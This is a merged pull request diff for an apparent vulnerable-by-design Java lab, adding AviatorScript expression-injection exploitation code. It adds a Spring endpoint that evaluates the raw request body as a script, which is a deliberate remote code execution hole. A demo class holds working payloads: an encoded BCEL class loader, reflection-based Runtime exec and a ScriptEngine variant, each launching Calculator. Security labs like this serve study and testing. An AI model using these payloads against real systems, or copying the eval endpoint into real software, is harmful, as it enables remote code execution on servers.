Merge pull request #1 from guchangan1/dev

Add Aviatorscript evaluation vulnerability exploitation code

Author: Whoopsunix

SecVulns/Springboot2/src/main/java/com/ppp/springboot/vul/code/AviatorScriptController.java

@@ -0,0 +1,33 @@
+package com.ppp.springboot.vul.code;
+
+import com.ppp.code.AviatorScriptAttack;
+import com.ppp.code.GroovyAttack;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestBody;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.net.URLDecoder;
+
+/**
+ * @author guchangan1
+ */
+
+@Controller
+@RequestMapping("/code/Aviator")
+public class AviatorScriptController {
+
+    // AviatorEvaluator
+    @RequestMapping("/case1")
+    @ResponseBody
+    public Object aviatorEvaluator(@RequestBody String requestBody, HttpServletRequest request, HttpServletResponse response) throws Exception {
+        String body = URLDecoder.decode(requestBody);
+        System.out.println(body);
+        AviatorScriptAttack aviatorScriptAttack = new AviatorScriptAttack();
+        Object result = aviatorScriptAttack.aviatorEvaluator(body);
+
+        return result;
+    }
+}

SecVulns/VulnCore/Code/pom.xml

@@ -14,6 +14,11 @@
     </properties>
 
     <dependencies>
+        <dependency>
+            <groupId>com.googlecode.aviator</groupId>
+            <artifactId>aviator</artifactId>
+            <version>5.2.6</version>
+        </dependency>
         <dependency>
             <groupId>org.codehaus.groovy</groupId>
             <artifactId>groovy</artifactId>
@@ -25,5 +30,11 @@
             <artifactId>junit</artifactId>
             <version>3.8.1</version>
         </dependency>
+        <dependency>
+            <groupId>com.googlecode.aviator</groupId>
+            <artifactId>aviator</artifactId>
+            <version>5.4.3</version>
+            <scope>compile</scope>
+        </dependency>
     </dependencies>
 </project>

SecVulns/VulnCore/Code/src/main/java/com/ppp/code/AviatorScriptAttack.java

@@ -0,0 +1,20 @@
+package com.ppp.code;
+
+import com.googlecode.aviator.AviatorEvaluator;
+import com.googlecode.aviator.AviatorEvaluatorInstance;
+import groovy.lang.GroovyShell;
+
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineManager;
+
+/**
+ * @author guchangan1
+ */
+public class AviatorScriptAttack {
+
+    public Object aviatorEvaluator(String script) throws Exception {
+        AviatorEvaluatorInstance evaluator = AviatorEvaluator.newInstance();
+
+        return evaluator.execute(script);
+    }
+}

SecVulns/VulnCore/Code/src/main/java/com/ppp/code/AviatorScriptDemo.java

@@ -0,0 +1,56 @@
+package com.ppp.code;
+
+import com.googlecode.aviator.AviatorEvaluator;
+import com.googlecode.aviator.AviatorEvaluatorInstance;
+import com.googlecode.aviator.Expression;
+import com.googlecode.aviator.runtime.JavaMethodReflectionFunctionMissing;
+
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineManager;
+import javax.script.ScriptException;
+
+/**
+ * @author guchangan1
+ * 参考：https://geekdaxue.co/read/lexiansheng@dix8fs/ll4oyy
+ */
+public class AviatorScriptDemo {
+    public static void main(String[] args) throws Exception {
+        /**
+         * AviatorEvaluatorInstance   bcel
+         */
+        AviatorEvaluatorInstance evaluator = AviatorEvaluator.newInstance();
+        //AviatorEvaluatorInstance.execute
+        evaluator.execute("'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeP$cbN$c2$40$U$3dCK$5bk$95$97$f8$7e$c4$95$c0$c2$s$c6$j$c6$NjbR$c5$88a_$ca$E$86$40k$da$c1$f0Y$baQ$e3$c2$P$f0$a3$8cw$w$B$a2M$e6$de9$e7$9es$e6$a6_$df$l$9f$ANq$60$p$8b$b2$8dul$a8$b2ib$cb$c46$83q$sB$n$cf$Z$b4J$b5$cd$a07$a2$$g$c8y$o$e4$b7$e3Q$87$c7$P$7egHL$d1$8b$C$7f$d8$f6c$a1$f0$94$d4e_$q$MY$afqsQ$t$c8$t$3c$608$aax$D$ff$c9w$87$7e$d8s$5b2$Wa$af$5e$5d$a0$ee$e2$u$e0IB$G$z$YuU$f4$3f9$83$7d9$J$f8$a3$UQ$98$98$d8$n$dc$8a$c6q$c0$af$84z$d7$a2$f7$8e$95$c9$81$B$d3$c4$ae$83$3d$ec$3bX$c1$w$85$d2$90$n$3f$cflv$G$3c$90$M$a5$94$S$91$7b$dd$9c$853$U$e6$c2$fbq$u$c5$88$f2$ed$k$973P$ae$y$$$3f$a5$eb8$84N$7fT$7d$Z0$b5$GU$8b$90K$9dQ$cf$d6$de$c0$5e$d2$f1$SU$p$r5$d8T$9d_$B$96$e9$G$9a$d2$da$a4R$e6$934$M$b0$de$91$a9$bdB$7b$fe$e37$W$fc$Wr$c8S$_$d0$d1$89$v$d2$v$a5$fa$b5$l$d5$l$f2$9c$f6$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open -a Calculator.app\") );");
+
+        //AviatorEvaluatorInstance.compile  Expression.execute
+//        Expression exp = evaluator.compile("'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeP$cbN$c2$40$U$3dCK$5bk$95$97$f" +
+//                "8$7e$c4$95$c0$c2$s$c6$j$c6$NjbR$c5$88a_$ca$E$86$40k$da$c1$f0Y$baQ$e3$c2$P$f0$a3$8cw$w$B$a2M$e6$de9$e7$9" +
+//                "es$e6$a6_$df$l$9f$ANq$60$p$8b$b2$8dul$a8$b2ib$cb$c46$83q$sB$n$cf$Z$b4J$b5$cd$a07$a2$$g$c8y$o$e4$b7$e3Q$" +
+//                "87$c7$P$7egHL$d1$8b$C$7f$d8$f6c$a1$f0$94$d4e_$q$MY$afqsQ$t$c8$t$3c$608$aax$D$ff$c9w$87$7e$d8s$5b2$Wa$af" +
+//                "$5e$5d$a0$ee$e2$u$e0IB$G$z$YuU$f4$3f9$83$7d9$J$f8$a3$UQ$98$98$d8$n$dc$8a$c6q$c0$af$84z$d7$a2$f7$8e$95$c" +
+//                "9$81$B$d3$c4$ae$83$3d$ec$3bX$c1$w$85$d2$90$n$3f$cflv$G$3c$90$M$a5$94$S$91$7b$dd$9c$853$U$e6$c2$fbq$u$c5" +
+//                "$88$f2$ed$k$973P$ae$y$$$3f$a5$eb8$84N$7fT$7d$Z0$b5$GU$8b$90K$9dQ$cf$d6$de$c0$5e$d2$f1$SU$p$r5$d8T$9d_$B$" +
+//                "96$e9$G$9a$d2$da$a4R$e6$934$M$b0$de$91$a9$bdB$7b$fe$e37$W$fc$Wr$c8S$_$d0$d1$89$v$d2$v$a5$fa$b5$l$d5$l$f2" +
+//                "$9c$f6$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open -a Calculator.app\") );");
+//        exp.execute();
+
+
+        /**
+         * AviatorEvaluatorInstance   onFunctionMissing
+         */
+//        AviatorEvaluatorInstance evaluator = AviatorEvaluator.newInstance();
+//        evaluator.setFunctionMissing(JavaMethodReflectionFunctionMissing.getInstance());
+//        evaluator.execute("exec(Runtime.getRuntime(), 'open -a Calculator.app')");
+
+
+        /**
+         * ScriptEngineManager  aviator
+         */
+//        ScriptEngineManager m = new ScriptEngineManager();
+//        ScriptEngine engine = m.getEngineByName("aviator");
+//        engine.eval("'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeP$cbN$c2$40$U$3dCK$5bk$95$97$f8$7e$c4$95$c0$c2$s$c6$j$c6$NjbR$c5$88a_$ca$E$86$40k$da$c1$f0Y$baQ$e3$c2$P$f0$a3$8cw$w$B$a2M$e6$de9$e7$9es$e6$a6_$df$l$9f$ANq$60$p$8b$b2$8dul$a8$b2ib$cb$c46$83q$sB$n$cf$Z$b4J$b5$cd$a07$a2$$g$c8y$o$e4$b7$e3Q$87$c7$P$7egHL$d1$8b$C$7f$d8$f6c$a1$f0$94$d4e_$q$MY$afqsQ$t$c8$t$3c$608$aax$D$ff$c9w$87$7e$d8s$5b2$Wa$af$5e$5d$a0$ee$e2$u$e0IB$G$z$YuU$f4$3f9$83$7d9$J$f8$a3$UQ$98$98$d8$n$dc$8a$c6q$c0$af$84z$d7$a2$f7$8e$95$c9$81$B$d3$c4$ae$83$3d$ec$3bX$c1$w$85$d2$90$n$3f$cflv$G$3c$90$M$a5$94$S$91$7b$dd$9c$853$U$e6$c2$fbq$u$c5$88$f2$ed$k$973P$ae$y$$$3f$a5$eb8$84N$7fT$7d$Z0$b5$GU$8b$90K$9dQ$cf$d6$de$c0$5e$d2$f1$SU$p$r5$d8T$9d_$B$96$e9$G$9a$d2$da$a4R$e6$934$M$b0$de$91$a9$bdB$7b$fe$e37$W$fc$Wr$c8S$_$d0$d1$89$v$d2$v$a5$fa$b5$l$d5$l$f2$9c$f6$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\") );");
+
+
+
+    }
+}